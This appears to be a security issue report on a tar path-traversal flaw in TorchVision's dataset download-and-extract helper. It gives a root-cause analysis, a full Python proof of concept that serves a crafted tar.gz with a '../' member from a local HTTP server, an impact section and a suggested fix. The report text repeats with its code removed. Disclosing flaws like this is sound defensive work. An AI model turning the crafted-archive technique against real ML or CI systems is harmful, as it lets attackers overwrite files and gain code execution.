🐛 Describe the bug
RCA
def download_and_extract_archive(
url: str,
download_root: Union[str, pathlib.Path],
extract_root: Optional[Union[str, pathlib.Path]] = None,
filename: Optional[Union[str, pathlib.Path]] = None,
md5: Optional[str] = None,
remove_finished: bool = False,
) -> None:
...
download_url(url, download_root, filename, md5)
The source is the caller-provided url. The helper downloads the remote archive into the local dataset cache.
archive = os.path.join(download_root, filename)
extract_archive(archive, extract_root, remove_finished)
The downloaded archive is propagated directly into the extraction helper.
def _extract_tar(from_path, to_path, compression):
with tarfile.open(from_path, f"r:{compression[1:]}" if compression else "r") as tar:
tar.extractall(to_path)
The sink is tar.extractall(to_path). There is no invariant that checks each member's resolved path remains under to_path, and symlink or hardlink members are not rejected before extraction.
PoC
import importlib.util
import io
import pathlib
import sys
import tarfile
import tempfile
import threading
import types
from http.server import BaseHTTPRequestHandler, HTTPServer
def load_torchvision_dataset_utils(repo_root: pathlib.Path):
class DummyTqdm:
def __init__(self, *args, **kwargs):
pass
def __enter__(self):
return self
def __exit__(self, *args):
return False
def update(self, *args, **kwargs):
pass
torch = types.ModuleType("torch")
torch.Tensor = object
torch_utils = types.ModuleType("torch.utils")
model_zoo = types.ModuleType("torch.utils.model_zoo")
model_zoo.tqdm = DummyTqdm
torch_utils.model_zoo = model_zoo
torch.utils = torch_utils
sys.modules["torch"] = torch
sys.modules["torch.utils"] = torch_utils
sys.modules["torch.utils.model_zoo"] = model_zoo
pkg = types.ModuleType("torchvision")
pkg.__path__ = []
datasets_pkg = types.ModuleType("torchvision.datasets")
datasets_pkg.__path__ = []
internal = types.ModuleType("torchvision._internally_replaced_utils")
internal._download_file_from_remote_location = lambda *args, **kwargs: None
internal._is_remote_location_available = lambda: False
sys.modules["torchvision"] = pkg
sys.modules["torchvision.datasets"] = datasets_pkg
sys.modules["torchvision._internally_replaced_utils"] = internal
utils_path = repo_root / "torchvision" / "datasets" / "utils.py"
spec = importlib.util.spec_from_file_location("torchvision.datasets.utils", utils_path)
module = importlib.util.module_from_spec(spec)
sys.modules[spec.name] = module
spec.loader.exec_module(module)
return module
class MaliciousTarHandler(BaseHTTPRequestHandler):
def log_message(self, *args):
pass
def do_HEAD(self):
self.send_response(200)
self.send_header("Content-Length", "1")
self.end_headers()
def do_GET(self):
body_io = io.BytesIO()
with tarfile.open(fileobj=body_io, mode="w:gz") as tar:
inside_data = b"ok\n"
inside = tarfile.TarInfo("inside.txt")
inside.size = len(inside_data)
tar.addfile(inside, io.BytesIO(inside_data))
marker_data = b"TORCHVISION_PATH_TRAVERSAL_CONFIRMED\n"
marker = tarfile.TarInfo("../torchvision_variant_marker")
marker.size = len(marker_data)
tar.addfile(marker, io.BytesIO(marker_data))
body = body_io.getvalue()
self.send_response(200)
self.send_header("Content-Type", "application/gzip")
self.send_header("Content-Length", str(len(body)))
self.end_headers()
self.wfile.write(body)
def main():
repo_root = pathlib.Path(sys.argv[1] if len(sys.argv) > 1 else ".").resolve()
dataset_utils = load_torchvision_dataset_utils(repo_root)
with tempfile.TemporaryDirectory() as temp_dir:
server = HTTPServer(("127.0.0.1", 0), MaliciousTarHandler)
thread = threading.Thread(target=server.serve_forever, daemon=True)
thread.start()
try:
download_root = pathlib.Path(temp_dir) / "download"
extract_root = pathlib.Path(temp_dir) / "extract"
url = f"http://127.0.0.1:{server.server_port}/dataset.tar.gz"
dataset_utils.download_and_extract_archive(
url,
str(download_root),
str(extract_root),
filename="dataset.tar.gz",
)
finally:
server.shutdown()
thread.join(timeout=2)
marker = pathlib.Path(temp_dir) / "torchvision_variant_marker"
print(f"inside_exists={(extract_root / 'inside.txt').exists()}")
print(f"traversal_marker_exists={marker.exists()}")
if marker.exists():
print(marker.read_text().strip())
if __name__ == "__main__":
main()
Impact
An attacker who can control a dataset archive URL or an archive supply path consumed by TorchVision dataset utilities can write files outside the intended extraction directory. In ML development, notebook, CI, or training environments, this can overwrite dataset cache files, project files, Python modules, or configuration files and may lead to code execution during later import, training, or evaluation steps.
Suggested Fix
Apply the same invariant used by the Keras fix for CVE-2025-12060: never extract untrusted tar members until their resolved output path is proven to remain under the destination directory. Reject absolute paths, .. traversal, symlinks, and hardlinks unless they are explicitly required and safely resolved.
For Python versions that support it, use tar extraction filters such as filter="data" together with explicit destination containment checks. Zip extraction should receive the same containment validation for member names.
Versions
TorchVision 0.27 Release
🐛 Describe the bug
RCA
The source is the caller-provided
url. The helper downloads the remote archive into the local dataset cache.The downloaded archive is propagated directly into the extraction helper.
The sink is
tar.extractall(to_path). There is no invariant that checks each member's resolved path remains underto_path, and symlink or hardlink members are not rejected before extraction.PoC
Impact
An attacker who can control a dataset archive URL or an archive supply path consumed by TorchVision dataset utilities can write files outside the intended extraction directory. In ML development, notebook, CI, or training environments, this can overwrite dataset cache files, project files, Python modules, or configuration files and may lead to code execution during later import, training, or evaluation steps.
Suggested Fix
Apply the same invariant used by the Keras fix for CVE-2025-12060: never extract untrusted tar members until their resolved output path is proven to remain under the destination directory. Reject absolute paths,
..traversal, symlinks, and hardlinks unless they are explicitly required and safely resolved.For Python versions that support it, use tar extraction filters such as
filter="data"together with explicit destination containment checks. Zip extraction should receive the same containment validation for member names.Versions
TorchVision 0.27 Release